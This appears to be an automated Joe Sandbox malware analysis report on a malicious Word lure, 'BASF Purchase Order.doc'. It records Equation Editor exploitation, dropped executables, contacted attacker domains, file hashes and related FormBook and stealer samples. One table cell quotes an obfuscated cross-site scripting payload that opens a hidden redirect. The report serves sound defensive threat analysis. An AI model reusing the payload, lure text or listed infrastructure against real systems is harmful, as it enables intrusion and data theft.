198.12.241.35	aceautocorp.com	United States	26496	AS-26496-GO-DADDY-COM-LLCUS	true
93.127.187.187	www.elenagilherrero.com.cdn.hstgr.net	Germany	62255	ASMUNDA-ASSC	true
54.38.220.85	www.kinkynerdspro.blog	France	16276	OVHFR	true
91.195.240.19	parkingpage.namecheap.com	Germany	47846	SEDO-ASDE	true
208.91.197.13	www.riveramayahousing.com	Virgin Islands (BRITISH)	40034	CONFLUENCE-NETWORK-INCVG	true
84.33.215.91	exclaimer342200213.net	Italy	34081	SERVER24-ASINCUBATECGmbH-SrlIT	true
67.223.117.189	www.touchclean.top	United States	15189	VIMRO-AS15189US	true
188.114.97.3	dukeenergyltd.top	European Union	13335	CLOUDFLARENETUS	true
89.116.109.159	www.ibistradingco.com.cdn.hstgr.net	Lithuania	15419	LRTC-ASLT	true
183.111.183.31	jnkinteractive.co.kr	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	true
66.96.161.166	www.terelprime.com	United States	29873	BIZLAND-SDUS	true

Private

IP
192.168.2.255

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1450820
Start date and time:	2024-06-03 08:50:30 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 20s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	BASF Purchase Order.doc
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winDOC@11/16@26/15
EGA Information:	Successful, ratio: 60%
HCA Information:	Successful, ratio: 74% Number of executed functions: 49 Number of non-executed functions: 159
Cookbook Comments:	Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Scroll down Close Viewer Override analysis time to 78336.4178019592 for current running targets taking high CPU consumption Override analysis time to 156672.835603918 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, svchost.exe
Execution Graph export aborted for target EQNEDT32.EXE, PID 652 because there are no executed function
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
02:51:19	API Interceptor	342x Sleep call for process: EQNEDT32.EXE modified
02:51:25	API Interceptor	6x Sleep call for process: sharon48399.scr modified
02:52:03	API Interceptor	21963x Sleep call for process: sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe modified
02:52:13	API Interceptor	12154428x Sleep call for process: dfrgui.exe modified

LLM Input / Output

Input

Output

URL: Office document Model: gpt-4o

```json
{
  "riskscore": 7,
  "reasons": "The document contains a visually prominent instruction to 'Enable editing from the yellow bar above.' This is a common tactic used in malicious documents to disable security features in office applications, potentially allowing harmful macros to run. The text creates a sense of urgency by implying that the user needs to enable editing to proceed. There is no direct impersonation of well-known brands, but the language used is formal and technical, which could mislead users into thinking it is a legitimate document from a professional source. The sense of urgency is directly connected to the prominent instruction, increasing the risk of the user following potentially harmful actions."
}

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
194.9.94.86	TT-Slip.bat.exe	Get hash	malicious	FormBook	Browse	www.torentreprenad.com/r45o/
	Doc PI.doc	Get hash	malicious	FormBook	Browse	www.xn--matfrmn-jxa4m.se/ufuh/
	Beauty_Stem_Invoice.doc	Get hash	malicious	FormBook	Browse	www.xn--matfrmn-jxa4m.se/ufuh/
	MOQ010524Purchase order.doc	Get hash	malicious	FormBook	Browse	www.xn--matfrmn-jxa4m.se/ufuh/
	SalinaGroup.doc	Get hash	malicious	FormBook	Browse	www.xn--matfrmn-jxa4m.se/ufuh/
	PAY-0129.exe	Get hash	malicious	FormBook	Browse	www.torentreprenad.com/s2u9/?7H=mTJ4yhH&qHaT0h=5U7DALWrxqzr56VTS66DkMzivwb8eJw+QuQWKosT9GGOOJNmCsoJdRf2YtOKiYr885RpspfnWz9oIB8tKqH0jqi0U2E5YHFFFQ==
	DHL_SOA_1004404989.exe	Get hash	malicious	FormBook	Browse	www.torentreprenad.com/s2u9/?j8j=6NzlX4xHmtqH&rR=5U7DALWrxqzr56VMLK7KnfayygnCZIw+QuQWKosT9GGOOJNmCsoJdRf2YtOKiYr885RpspfnWz9oIB8tKqH3pN+aCUsxPyV8FA==
	Scan00516.js	Get hash	malicious	FormBook, MailPassView, WSHRAT	Browse	www.acre-com.com/me15/?i8O=bxl0&VPudI=AMxDUnLLexuTfXRuHqoxzPfeXrfBw2lKu15RcCpXpuJEBCulcUbatn2YVJ6xbnCfmbZZ
	SHIPPINGDOCUMENTS.25.23.exe	Get hash	malicious	FormBook	Browse	www.udda.app/ga36/?-Zk4Ah=uKy05ssFXwD7lx+pwOkpcz0JYvvlr0Fm4k7Q090T/1T8NUAbWqhr3VP8iMZHhaUYUaRp&-ZVd=5jo8nLy8
	g8G146l8XU.exe	Get hash	malicious	FormBook	Browse	www.frostdal.se/s26y/?8pAlmdiX=882d78zUy4+UMlJ0mFcKU0FzzswBpgbUl63S0CTJJ7YYOy24S5YeYqbYAzkKlVaYLwFJ&h0DxKN=l4G4b
45.33.6.223	product Inquiry and RFQ ART LTD.doc	Get hash	malicious	FormBook	Browse	www.sqlite.org/2017/sqlite-dll-win32-x86-3180000.zip
	New Order.doc	Get hash	malicious	FormBook	Browse	www.sqlite.org/2016/sqlite-dll-win32-x86-3100000.zip
	PURCHASE ORDER.doc	Get hash	malicious	FormBook	Browse	www.sqlite.org/2019/sqlite-dll-win32-x86-3290000.zip
	ENQUIRY OFFER.xls	Get hash	malicious	FormBook	Browse	www.sqlite.org/2019/sqlite-dll-win32-x86-3290000.zip
	APR0927,24.doc	Get hash	malicious	FormBook	Browse	www.sqlite.org/2022/sqlite-dll-win32-x86-3390000.zip
	Doc PI.doc	Get hash	malicious	FormBook	Browse	www.sqlite.org/2017/sqlite-dll-win32-x86-3210000.zip
	APR0927,24.doc	Get hash	malicious	FormBook	Browse	www.sqlite.org/2021/sqlite-dll-win32-x86-3350000.zip
	Enquiry List.xls	Get hash	malicious	FormBook	Browse	www.sqlite.org/2017/sqlite-dll-win32-x86-3190000.zip
	ITEMS.xls	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.sqlite.org/2017/sqlite-dll-win32-x86-3160000.zip
	TT swift copy.xls	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.sqlite.org/2018/sqlite-dll-win32-x86-3220000.zip

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
dukeenergyltd.top	QTE000021674.doc	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	Swift Copy.doc	Get hash	malicious	Lokibot	Browse	188.114.97.3
	product Inquiry and RFQ ART LTD.doc	Get hash	malicious	FormBook	Browse	188.114.96.3
	INV 267365.doc	Get hash	malicious	Unknown	Browse	188.114.96.9
	REQBUS23ED.doc	Get hash	malicious	Unknown	Browse	188.114.97.3
	PURCHASE ORDER.doc	Get hash	malicious	FormBook	Browse	188.114.97.3
	ARRIVAL NOTICE.doc	Get hash	malicious	Lokibot	Browse	188.114.96.3
	https://dukeenergyltd.top/bles.scr	Get hash	malicious	HTMLPhisher	Browse	188.114.97.3
	https://dukeenergyltd.top/bles.scr	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	APR0927,24.doc	Get hash	malicious	FormBook	Browse	188.114.97.3
www.riveramayahousing.com	SecuriteInfo.com.Win32.PWSX-gen.24627.22980.exe	Get hash	malicious	FormBook	Browse	208.91.197.13
	opszx.scr.exe	Get hash	malicious	FormBook	Browse	208.91.197.13
	MOQ010524Purchase order.doc	Get hash	malicious	FormBook	Browse	208.91.197.13
	NEW-ORDER_pdf.exe	Get hash	malicious	FormBook	Browse	208.91.197.13
	alhadani Aprilorders140424.scr.exe	Get hash	malicious	FormBook	Browse	208.91.197.13
	AWB5889829680.scr.exe	Get hash	malicious	FormBook	Browse	208.91.197.13
	Invoice.exe	Get hash	malicious	DBatLoader, FormBook	Browse	208.91.197.13
www.xn--matfrmn-jxa4m.se	SecuriteInfo.com.Win32.PWSX-gen.24627.22980.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	product Inquiry and RFQ ART LTD.doc	Get hash	malicious	FormBook	Browse	194.9.94.85
	New Order.doc	Get hash	malicious	FormBook	Browse	194.9.94.85
	GXu0Ow8T1h.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	GcwoApxt8q.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	Doc PI.doc	Get hash	malicious	FormBook	Browse	194.9.94.86
	opszx.scr.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	Beauty_Stem_Invoice.doc	Get hash	malicious	FormBook	Browse	194.9.94.86
	MOQ010524Purchase order.doc	Get hash	malicious	FormBook	Browse	194.9.94.86
	SalinaGroup.doc	Get hash	malicious	FormBook	Browse	194.9.94.86

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
LOOPIASE	TT-Slip.bat.exe	Get hash	malicious	FormBook	Browse	194.9.94.86
	SecuriteInfo.com.Win32.PWSX-gen.24627.22980.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	product Inquiry and RFQ ART LTD.doc	Get hash	malicious	FormBook	Browse	194.9.94.85
	COMMANDE.EXE.exe	Get hash	malicious	DBatLoader, FormBook	Browse	194.9.94.85
	New Order.doc	Get hash	malicious	FormBook	Browse	194.9.94.85
	GXu0Ow8T1h.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	GcwoApxt8q.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	Doc PI.doc	Get hash	malicious	FormBook	Browse	194.9.94.86
	opszx.scr.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	Beauty_Stem_Invoice.doc	Get hash	malicious	FormBook	Browse	194.9.94.86
CLOUDFLARENETUS	http://www.sharepoint-atp.com/	Get hash	malicious	Unknown	Browse	1.1.1.1
	hhghhg.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	PAYMENT SWIFT.exe	Get hash	malicious	FormBook	Browse	104.21.40.171
	Purchase Order_20240503.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
	Scanned Documents.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
	Reconfirm bank details.rar.exe	Get hash	malicious	FormBook	Browse	172.67.137.210
	https://ids.calfrom.org/	Get hash	malicious	Unknown	Browse	188.114.96.3
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.4196.18392.rtf	Get hash	malicious	Unknown	Browse	172.67.175.222
	Setup_v1.9.3.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	xWVWqU5rd5.exe	Get hash	malicious	RisePro Stealer	Browse	104.26.4.15
LINODE-APLinodeLLCUS	file.exe	Get hash	malicious	SystemBC	Browse	72.14.185.43
	3Lf408k9mg.exe	Get hash	malicious	PureLog Stealer, SystemBC	Browse	45.33.23.183
	http://trumpmaga.vip/NbqUu	Get hash	malicious	Unknown	Browse	45.56.91.11
	MAWB# 695-47123101 - PN1 MOL MAESTRO V-073E..scr.exe	Get hash	malicious	FormBook	Browse	45.33.23.183
	Factura 02297-23042024.exe	Get hash	malicious	FormBook, GuLoader	Browse	139.162.5.234
	https://extranet2.dellavolpe.com.br/coleta/consulta#	Get hash	malicious	Unknown	Browse	69.164.220.55
	http://extranet2.dellavolpe.com.br	Get hash	malicious	Unknown	Browse	69.164.220.55
	product Inquiry and RFQ ART LTD.doc	Get hash	malicious	FormBook	Browse	45.33.6.223
	PDF89gh ReUrgent Quotepdf.exe	Get hash	malicious	FormBook	Browse	45.79.87.252
	EJB2aXJFgL.elf	Get hash	malicious	Unknown	Browse	172.105.107.238
AS-26496-GO-DADDY-COM-LLCUS	4xGw66BS5c.elf	Get hash	malicious	Mirai	Browse	160.153.44.212
	http://geminiimxlogin.godaddysites.com/	Get hash	malicious	Unknown	Browse	198.71.248.123
	file.exe	Get hash	malicious	SystemBC	Browse	148.72.90.83
	inquiry EBS# 82785.exe	Get hash	malicious	AgentTesla	Browse	43.255.154.55
	3Lf408k9mg.exe	Get hash	malicious	PureLog Stealer, SystemBC	Browse	107.180.89.87
	SOA MAY.pdf_______________________________________________________________________.exe	Get hash	malicious	AgentTesla	Browse	68.178.145.49
	Enquiry - ENQ#16801.exe	Get hash	malicious	AgentTesla	Browse	43.255.154.55
	0044FIDB240149 swift.exe	Get hash	malicious	AgentTesla	Browse	182.50.135.77
	SecuriteInfo.com.Trojan.Heur3.CTR.301bbRm0@amk5Nyl.20112.16423.exe	Get hash	malicious	AgentTesla	Browse	43.255.154.55
	https://www.iodatasphere.com/apply.php?jobID=6%22%3E%3Cdiv%3E%3CSCRIpt%3E%0D%0Anartub%3D%28golx%29%3D%3Ethis%5B%27decod%27%2B%27eURICo%27%2B%27mponent%27%5D%28this%5B%27ato%27%2B%27b%27%5D%28golx%29%29%3B%0D%0Asaizo%3Dthis%5B%27doc%27%2B%27um%27%2B%27ent%27%5D%3Bsaizox%3Dthis%5B%27wi%27%2B%27nd%27%2B%27ow%27%5D%3B%0D%0Asaizo%5B%27title%27%5D%3D%27%5E.%5E%27%3B%20saizo%5B%27body%27%5D%5B%27style%27%5D%5B%27display%27%5D%3D%27none%27%3B%0D%0Asaizox%5B%27ope%27%2B%27n%27%5D%28nartub%28%27JTY4JTc0JTc0JTcwJTczJTNBJTJGJTJGJTY5JTZEJTcwJTc1JTc0JTY1JTZDJTY1JTc0JTc0JTY1JTcyJTJFJTYzJTZGJTZEJTJGJTMwJTJGJTMwJTJGJTMwJTJGJTYzJTY2JTY0JTMyJTM2JTM5JTM3JTM4JTYyJTMxJTY0JTYxJTM5JTM3JTYzJTY0JTM1JTMyJTYzJTM3JTM0JTMzJTM2JTY1JTMxJTYzJTMwJTM1JTYxJTM3JTM5JTYz%27%29%2B%27%2F9%2F293-11192%2F964-3837-18102%2F%27%2Cnartub%28%27JTVGJTczJTY1JTZDJTY2%27%29%29%3B%0D%0A%3C%2FSCRIpt%3E	Get hash	malicious	Unknown	Browse	107.180.2.50

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
7dcce5b76c8b17472d024758970a406b	SecuriteInfo.com.Exploit.CVE-2018-0798.4.4196.18392.rtf	Get hash	malicious	Unknown	Browse	188.114.97.3
	Whatsapp-IMG-87383-0001.xls	Get hash	malicious	Remcos	Browse	188.114.97.3
	RFQ23583839list.doc	Get hash	malicious	DBatLoader	Browse	188.114.97.3
	New PO for Project - 00775, 00875 02195.doc	Get hash	malicious	Unknown	Browse	188.114.97.3
	QTE000021674.doc	Get hash	malicious	HTMLPhisher	Browse	188.114.97.3
	revised PI.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	188.114.97.3
	TT COPY.doc	Get hash	malicious	Unknown	Browse	188.114.97.3
	orden de compra PO05272024.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	188.114.97.3
	TDT_579076356806521.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	188.114.97.3
	Swift Copy.doc	Get hash	malicious	Lokibot	Browse	188.114.97.3

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\sqlite3.dll	APR0927,24.doc	Get hash	malicious	FormBook	Browse
	PO-210.xls	Get hash	malicious	Unknown	Browse
	1pnboZHFBw.exe	Get hash	malicious	Unknown	Browse
	6KTgt5cvlI.exe	Get hash	malicious	Unknown	Browse
	rMRyXHcqPD.exe	Get hash	malicious	Unknown	Browse
	rMRyXHcqPD.exe	Get hash	malicious	Unknown	Browse
	6OYe8LzpcJ.exe	Get hash	malicious	Unknown	Browse
	41-1909.xls	Get hash	malicious	FormBook	Browse
	ORDER.xls	Get hash	malicious	FormBook	Browse
	Minimal_Stock_Report_11-11-2022-01006.xls	Get hash	malicious	FormBook	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sharon[1].scr

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	825856
Entropy (8bit):	7.322568694923543
Encrypted:	false
SSDEEP:	24576:g32nESrd+mqHyzIuSa1OcQuus373aEux6wDbbdlofn:U2nEsIs1OcQuus373aEuBbnofn
MD5:	CBFEE83ADF934845EB949B5449FBBF84
SHA1:	9F12B0AE613BB57CD8F72EAB2C8B1BCDB3B8442B
SHA-256:	A6283622F7508644692B1AAB7AA7B1F1E9E9DC56C86710CEC7BCAEC8DB55DA6D
SHA-512:	5276D4EB5DBE373243B1469F5152FE7B1DDB49A54EB481E88087796834BF58B1A39F6774F1D298A24378491161DEF07D5D18F6A7E07C96BCE869E16ABB75F60E
Malicious:	true
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....b............"...0.................. ........@.. ....................................`....................................O.......J............................................................................ ............... ..H............text...$.... ...................... ..`.rsrc...J...........................@..@.reloc..............................@..B........................H........s...8..........................................................&.(>.....".......".(C....Vs....(D...t............}.....(E.....~4...t....(F...&.(........(.........".s....&.(f...(#...og...oh....#..4....(i....0.......}3....(>.......{3....X.....}2...z.(>.......}5.....}6.....}7.....(>....~9......9...V(&...r...p~9...op...V(&...r+..p~9...op...V(&...r...p~9...op...V(&...r...p~9...op...V(&...r;..p~9...op...V(&...r}..p~9...op...V(&...r...p~9...op...*V(&...r.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\sqlite-dll-win32-x86-3390000[1].zip

Download File

Process:	C:\Windows\SysWOW64\dfrgui.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	570720
Entropy (8bit):	7.99877064981242
Encrypted:	true
SSDEEP:	12288:DVMWgzNoeuQ/aJltXT8cLv0vK1i1WlX14Cr1pnJQb+5Qj73x+WPMMyC:JMWkN5WlT8cLcoLlX14Cr/JMfJxR
MD5:	D113A47C6AC162A76D78C817AEB57755
SHA1:	F301CEA25C2032DD67FFBD21242B209F0EE70EE2
SHA-256:	BAE32DF8FA24A3E55BCC1591E09918259173F870090E2AE775509EDB8B893EB4
SHA-512:	BA64E248EE75FA43CAE60C1E0815C512F89EABC140B35AA696D428A3F5D328DB04981C0F500B78211BBFD9087BA678328C8AD63AC51249062900693A1D399178
Malicious:	false
Reputation:	low
Preview:	PK...........T..,............sqlite3.defUT....(.b.(.bux.................&.@.....\....J..N.$$.@f...>.pE7 g.../.z.o...._...........+s\|..r......N..C....;........M7...P.n5..j...-..........Q.P.0J=...o....S&.........s.Me.J.#....[.4l....#.....j....?...../..a\|9.a....."}pE..l.I........5lL... @'v.}......_N...W..M.<_`. ..d3..(.%.?z..;.n...4$......p7....Q..._.%..!.L.]..I..Sg..>..'.Hn.4.J..s.Y/..5.....s..-;n-...t..B.$.}.........9.9...8B..A.d.B.N.g>_.P......oFb..v>.}......$....3..{...;3hJ.T.j..aO.f.U.' Q;..+..(..,......c-..'......7..!!'G.X...xK.i?pv<..J-b...0.9.....jd.....+...$[@wj...z.y..[..d.o..h....h.hU8c!(=..;/.4....#Nl.."=j...F.....@v.Pw.....V..%.Y.......@Rs......A...Zn....l...Wf..!<.fs...R...s.J..3.w.VC...h3.e.(..Bj..'....S..0...K.9..Q.-0.z....]!D....iN.i%.7Pt[..@Z...p:h.'..N.......X..:.VM...$.~.w........c...E.:..*..M..G..._..+..L...0zSrL.l.3l.3.~..!..AQ.}...`..1..e.w^..7.LJ=UCt..e..H.k..u{0\|_........2..1.....qr.I..KB...5s(/.N.2.^.B..a.b1.q..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\68910914.wmf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Windows metafile
Category:	dropped
Size (bytes):	162
Entropy (8bit):	3.0822836798610673
Encrypted:	false
SSDEEP:	3:Vmcll/6/lyll6/lollvlgiolog/lLneVOoEXaQNGbV91/l/eXavt/y:MUl/6t2oto90ogtqAozQNGbVPQXC1y
MD5:	A53FF3B2B74B0493CD2DD5351BCB2760
SHA1:	982C525BE61D9769829D2F0A94DB5D61D95BA050
SHA-256:	AC5F55A119B8894F347A6E85328D4A1E7BA350E0D4EA98CE1D3B2F95FAECB5F2
SHA-512:	0E33ADB10427D0E8BEF3E170009361CC569F0EA0CCBA63609BB91CB7830A8EE7B4C65C92FC56DEF2D0AB5E69F6CA955410F1B3761AB34D18CC45BBDCB10F7F65
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......Q................................................................... . .....&...................................&.....MathType..P.....&.....................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{D6B5528C-BFB8-4790-8015-41F6DA2A2FE7}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	CE338FE6899778AACFC28414F2D9498B
SHA1:	897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
SHA-256:	4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
SHA-512:	6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{3A01D4A1-178B-4603-9BE4-7DECA3DA952D}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6D25CF23-6A72-4510-8E0A-5A45DD580DCB}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	25600
Entropy (8bit):	3.7337330733697884
Encrypted:	false
SSDEEP:	768:rgI2Q5Q6IQXwvW5Kq2g01sOQPmrgO+lzU:gSyemQmrt
MD5:	C6EF9D0600ADD71B827BF632E98E66F6
SHA1:	6EDFC9D1A1953EEECA09752D66256417FABCB2F0
SHA-256:	2CA294B59C9CAA710FEA11567F6B1F36A24186F9AB18DBE0E8E1F7F14C15F819
SHA-512:	1BA5A47F70FA21951604DE21C8EE3F322A08FEA7F524FC300FBA58F74956658DD7D2E7D5E7AF5AA3C754F0262EC1D221B0DD38431E3CE4AD4341EE0CB76872FC
Malicious:	false
Preview:	5.0.6.1.5.9.2.5.p.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .e.d.i.t.i.n.g. .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e...T.h.e. .i.n.d.e.p.e.n.d.e.n.t. .a.u.d.i.t.o.r.s.. .o.p.i.n.i.o.n. .s.a.y.s. .t.h.e. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s. .a.r.e. .f.a.i.r.l.y. .s.t.a.t.e.d. .i.n. .a.c.c.o.r.d.a.n.c.e. .w.i.t.h. .t.h.e. .b.a.s.i.s. .o.f. .a.c.c.o.u.n.t.i.n.g. .u.s.e.d. .b.y. .y.o.u.r. .o.r.g.a.n.i.z.a.t.i.o.n... .S.o. .w.h.y. .a.r.e. .t.h.e. .a.u.d.i.t.o.r.s. .g.i.v.i.n.g. .y.o.u. .t.h.a.t. .o.t.h.e.r. .l.e.t.t.e.r. .I.n. .a.n. .a.u.d.i.t. .o.f. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s.,. .p.r.o.f.e.s.s.i.o.n.a.l. .s.t.a.n.d.a.r.d.s. .r.e.q.u.i.r.e. .t.h.a.t. .a.u.d.i.t.o.r.s. .o.b.t.a.i.n. .a.n. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .t.h.e. .e.x.t.e.n.t. .n.e.c.e.s.s.a.r.y. .t.o. .p.l.a.n. .t.h.e. .a.u.d.i.t... .A.u.d.i.t.o.r.s. .u.s.e. .t.h.i.s. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .a.s.s.e.s.s. .

C:\Users\user\AppData\Local\Temp\13d6pS3

Download File

Process:	C:\Windows\SysWOW64\dfrgui.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	77824
Entropy (8bit):	1.133993246026424
Encrypted:	false
SSDEEP:	96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
MD5:	8BB4851AE9495C7F93B4D8A6566E64DB
SHA1:	B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
SHA-256:	143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
SHA-512:	DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
Malicious:	false
Preview:	SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\q4y4nra8.zip

Download File

Process:	C:\Windows\SysWOW64\dfrgui.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	570720
Entropy (8bit):	7.99877064981242
Encrypted:	true
SSDEEP:	12288:DVMWgzNoeuQ/aJltXT8cLv0vK1i1WlX14Cr1pnJQb+5Qj73x+WPMMyC:JMWkN5WlT8cLcoLlX14Cr/JMfJxR
MD5:	D113A47C6AC162A76D78C817AEB57755
SHA1:	F301CEA25C2032DD67FFBD21242B209F0EE70EE2
SHA-256:	BAE32DF8FA24A3E55BCC1591E09918259173F870090E2AE775509EDB8B893EB4
SHA-512:	BA64E248EE75FA43CAE60C1E0815C512F89EABC140B35AA696D428A3F5D328DB04981C0F500B78211BBFD9087BA678328C8AD63AC51249062900693A1D399178
Malicious:	false
Preview:	PK...........T..,............sqlite3.defUT....(.b.(.bux.................&.@.....\....J..N.$$.@f...>.pE7 g.../.z.o...._...........+s\|..r......N..C....;........M7...P.n5..j...-..........Q.P.0J=...o....S&.........s.Me.J.#....[.4l....#.....j....?...../..a\|9.a....."}pE..l.I........5lL... @'v.}......_N...W..M.<_`. ..d3..(.%.?z..;.n...4$......p7....Q..._.%..!.L.]..I..Sg..>..'.Hn.4.J..s.Y/..5.....s..-;n-...t..B.$.}.........9.9...8B..A.d.B.N.g>_.P......oFb..v>.}......$....3..{...;3hJ.T.j..aO.f.U.' Q;..+..(..,......c-..'......7..!!'G.X...xK.i?pv<..J-b...0.9.....jd.....+...$[@wj...z.y..[..d.o..h....h.hU8c!(=..;/.4....#Nl.."=j...F.....@v.Pw.....V..%.Y.......@Rs......A...Zn....l...Wf..!<.fs...R...s.J..3.w.VC...h3.e.(..Bj..'....S..0...K.9..Q.-0.z....]!D....iN.i%.7Pt[..@Z...p:h.'..N.......X..:.VM...$.~.w........c...E.:..*..M..G..._..+..L...0zSrL.l.3l.3.~..!..AQ.}...`..1..e.w^..7.LJ=UCt..e..H.k..u{0\|_........2..1.....qr.I..KB...5s(/.N.2.^.B..a.b1.q..

C:\Users\user\AppData\Local\Temp\sqlite3.def

Download File

Process:	C:\Windows\SysWOW64\dfrgui.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	7382
Entropy (8bit):	4.35179414347402
Encrypted:	false
